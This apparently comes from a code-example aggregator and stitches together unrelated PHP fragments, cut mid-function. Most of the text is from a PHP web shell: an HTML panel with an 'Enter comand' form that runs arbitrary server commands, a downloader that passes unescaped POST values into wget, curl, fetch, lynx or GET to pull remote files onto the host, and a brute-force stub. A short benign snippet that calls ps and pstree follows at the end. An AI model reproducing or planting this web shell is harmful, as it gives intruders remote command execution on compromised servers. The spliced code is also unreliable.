            <textarea style="width:100%;" rows="10">' . $usuarios . '</textarea><br><br>';
    }
    return $salida;
}
                    shell(which('wget') . " " . $_POST['urldown'] . " -O " . $_POST['filename'] . "");
                    break;
                case fetch:
                    shell(which('fetch') . " -o " . $_POST['filename'] . " -p " . $_POST['urldown'] . "");
                    break;
                case lynx:
                    shell(which('lynx') . " -source " . $_POST['urldown'] . " > " . $_POST['filename'] . "");
                    break;
                case links:
                    shell(which('links') . " -source " . $_POST['urldown'] . " > " . $_POST['filename'] . "");
                    break;
                case GET:
                    shell(which('GET') . " " . $_POST['urldown'] . " > " . $_POST['filename'] . "");
                    break;
                case curl:
                    shell(which('curl') . " " . $_POST['urldown'] . " -o " . $_POST['filename'] . "");
                    break;
            }
        }
    }
}
//Brute
if ($action == 'brute') {
    function Brute()
    {
        global $action, $pass_de, $chars_de, $dat, $date;
        ignore_user_abort(1);
    }
    if ($chars_de == "") {
        $chars_de = "";
    }
</td>
<td width="25%" >Server time: <?php 
echo date('H:i d-m-Y');
?>
</td>
</tr>
</table>
</td></tr></table>
<table width=95% border=0 cellspacing=1 cellpadding=1 bgcolor=#646c71 style=border-color: #000000;>
<tr><th class=t align=left><b>Shell</b></th></tr>
<tr><td class=contentb><center>
<form action method=POST>
<input type=hidden name="type" value=5>
<textarea cols=150 rows=20 name="value">
<?php 
echo htmlspecialchars(shell());
?>
</textarea><?php 
echo edit();
?>
</form>
<table border="0" width="100%">
<tr>
<td width="50%" align="center"><form action method=POST>
<b>Enter comand:</b>
<input type=hidden name="type" value=2>
<input type=text name="value" size=45><input type=submit value="Enter">
</form></td>
<td width="50%" align="center"><form action method=POST><b>PWD:</b> <input type=text name="value" size=51 value=<?php 
echo pwd();
?>
示例#30
0
<?php

require __DIR__ . '/../../share/app.php';
try {
    $pid = intval($_GET['pid']);
    $out = shell(sprintf('ps -p %s', escapeshellarg($pid)));
    echo '<pre>', $out, '</pre>';
    $out = shell(sprintf('pstree -cl -p %s', escapeshellarg($pid)));
    echo '<pre>', $out, '</pre>';
} catch (Exception $exception) {
    echo '<pre class="alert alert-danger">', htmlspecialchars($exception->getMessage()), '</pre>';
}